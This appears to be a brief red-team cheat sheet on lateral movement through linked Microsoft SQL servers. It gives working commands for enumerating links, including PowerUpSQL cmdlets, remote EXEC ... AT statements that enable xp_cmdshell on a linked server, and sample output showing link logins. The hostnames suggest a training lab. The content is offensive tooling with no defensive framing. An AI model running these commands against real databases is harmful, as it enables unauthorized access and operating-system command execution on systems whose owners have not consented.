MS SQL Lateral Movement
Discover any links (linked sql servers)
SELECT srvname, srvproduct, rpcout FROM master..sysservers;EXEC sp_linkedserversQuery linked server using module
powershell Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433"Enable xp_cmdshell on linked server
EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io]Get linked server details
Get-SQLServerLink -Instance sql11 -Verbose
DatabaseLinkName : SQL27
DatabaseLinkLocation : Remote
Product : SQL Server
Provider : SQLNCLI
LocalLogin : webapp11
RemoteLoginName : webappGroupCome home to me
Last updated